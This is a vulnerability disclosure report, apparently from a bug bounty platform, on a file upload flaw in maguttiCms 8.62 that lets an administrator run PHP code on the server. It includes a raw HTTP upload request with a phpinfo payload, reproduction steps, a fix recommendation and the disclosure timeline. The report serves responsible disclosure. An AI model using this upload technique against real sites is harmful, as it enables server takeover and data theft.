Unrestricted Upload of File with Dangerous Type in marcoax/magutticms

Valid

Reported on

Oct 25th 2021

Description

RCE via 'upload file image or document' on maguttiCms 8.62 allows remote authenticated administrators to execute arbitrary PHP code

Proof of Concept

// PoC.req
POST /admin/api/uploadifiveSingle HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------289373597033088154093484704035
Content-Length: 1123
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/admin/edit/articles/2
Cookie: CRM-a065912273e9ce1828ca92e192338d12=hl8kmfm92bf9ducncp1qro5ibo; PHPSESSID=rooedmi2ipb8qpu8mie54h0g6r; install_f528764d624d=d7sr8hakotuhjg37mg4spnjghv; _hjid=2f0f1c3b-7bed-4258-933b-ff637ebfdec0; __hstc=19301799.95f1db85f7fcdf6d34a1f1b99da598b0.1634716071331.1634716071331.1634716071331.1; hubspotutk=95f1db85f7fcdf6d34a1f1b99da598b0; __hssrc=1; ajs_anonymous_id=7365ff25-af33-4fe1-9758-7e557b70493a; __utma=96992031.1997153298.1634716441.1634716441.1634716441.1; __utmc=96992031; __utmz=96992031.1634716441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionid=356kck05s8r7pcu3pgonp32stq; XSRF-TOKEN=eyJpdiI6IjZuRlhoUWowM3lsNFBxSkN4MlduZ1E9PSIsInZhbHVlIjoia1VXUmZ3cmlyQ1NsRjlDK243VDhTZlphRkV0bW55K001Uk5QLytNY2p6TFdmZmw5a091K2s0OVE1aTk3VFRWUVM0Z2hWNFpURnRWU20wb1VKSUNkaGFQWmRyRTQyeDJFMGFVYXdZdlRialBuUW44MVJ2aWJXbGlFeVJOSWh4V0ciLCJtYWMiOiJjNTlmYmNmNjlkMGYxY2NjMzIxNjg1MGYxNjZiODEyOTQyMzZhZGVjNTdkOWI0OWRkMTRmMjZjZjcwMzUwYjI5IiwidGFnIjoiIn0%3D; magutticms_session=eyJpdiI6Im4wS0huUmJaZWVtb0Rxd2tPOEZPdnc9PSIsInZhbHVlIjoieE95SmNUL1dEcGk1SUMzeXpDVWcrS2tpN2tQN3NXL1ZhbzlnaEloNzlOUThIelJuSzVsekY5V2ZXWE9YS0lMZU5SdGdRcDhma2owWlNkRWpZdjZuVkZMd1E5NTFINUpUU1ZxWTNxUlZwQUwxajB6R2E4NkZaL1c3WWU0ZVc0R0EiLCJtYWMiOiIzNWQyNDg5ZDEyYmEzZGM3NDBlMTYwZDEzOGU0MzBlZTVhZmQzZDc3Njc0ZmI0MmQxM2U5Y2VmOWMzZjJiNDY3IiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
Content-Type: text/php

<?php echo phpinfo(); ?>
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="timestamp"

1451682058
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="token"

4b9fe8f26d865150e4b26b2a839d4f2b
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="Id"

2
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="myImgType"


-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="model"

Article
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="key"

doc
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="_token"

ZvErjYb1Qmxp84MY7btjvjnYjryEFe8SuyEReMgo
-----------------------------289373597033088154093484704035--

Step to Reproduct

Pages

Goto Page choose to Create page

At Image or Document selection upload a file like phpinfo.php

Choose to Edit one page

At tab Media choose a file like phpinfo.php

Access file with URL: https://domain/media/docs/xxxx-phpinfo.php or https://domain/media/image/xxxx-phpinfo.php

Slides

Goto Slides choose to Create slide

At Image selection upload a file like phpinfo.php

Access file with URL: https://domain/media/image/xxxx-phpinfo.php

News

Goto News choose to Create new

At Image File Manager selection upload a file like phpinfo.php

At Document selection upload a file like phpinfo.php

Access file with URL: https://domain/media/docs/xxxx-phpinfo.php

How to find file name

Once saved the filenames are returned in the response or you can view them by viewing the source code in your browser

Note

Because all the features use the same image and document file handling functions mentioned above, I just Permalink where the vulnerability exists.

Impact

This vulnerability could potentially allow an attacker to gain access to a web server and steal sensitive content stored on the web server.

Recomendation

Perform a check of the allowed file formats, check file extension, check file type, ... before storing them on the server. Laravel provides several different approaches to validate your application's incoming data.

References

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

lethanhphuc modified the report

2 years ago

We have contacted a member of the marcoax/magutticms team and are waiting to hear back 2 years ago

We have sent a follow up to the marcoax/magutticms team. We will try again in 7 days. 2 years ago

We have sent a second follow up to the marcoax/magutticms team. We will try again in 10 days. 2 years ago

marcoax validated this vulnerability 2 years ago

lethanhphuc has been awarded the disclosure bounty

The fix bounty is now up for grabs

marcoax marked this as fixed with commit 39b55d 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation